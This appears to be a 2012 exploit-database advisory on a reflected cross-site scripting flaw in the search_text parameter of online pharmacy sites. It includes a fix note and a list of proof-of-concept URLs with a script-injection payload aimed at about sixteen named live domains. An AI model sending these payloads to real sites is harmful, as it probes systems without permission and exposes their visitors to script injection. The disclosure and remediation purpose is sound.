+-------------------------------------------------------------------------+
# Exploit Title : Online Pharmacy - Website XSS (Cross Site Scripting)
# Author         : Atmon3r
# Date            : 26/02/2012
# Editor          : Lupu, Marianna
# Perso           : Do you want drUgs?
# XSS type      : Reflected, via the $_GET parameter search_text
+-------------------------------------------------------------------------+

[+] POC:

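http://{website}/search.php?search_text=[XSS]

Note: search_text appears to be written back into the results page without HTML encoding; the leading /"> in the examples below suggests it lands inside an attribute value.
Fix: encode the value on output, in PHP e.g. htmlspecialchars($value, ENT_QUOTES, 'UTF-8'), rather than filtering the input.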

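[+] Exploits (every host exposes the same search.php path; I1.x / I1.y look like image-submit click coordinates and are not part of the injection)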

http://prohealthpharma.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drug-brand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drug-clomid.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drugsforyou.net/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://drug-clomid.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14 

http://drugbrand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14 

http://gobuypills.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://ed-pharmarx.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://buyingprograf.org/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://drug-accutane.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://bestsellers-rx.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://drug-doxycycline.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://buyingcozaar.org/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://buyinglamictal.org/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drug-brand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drugbrand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11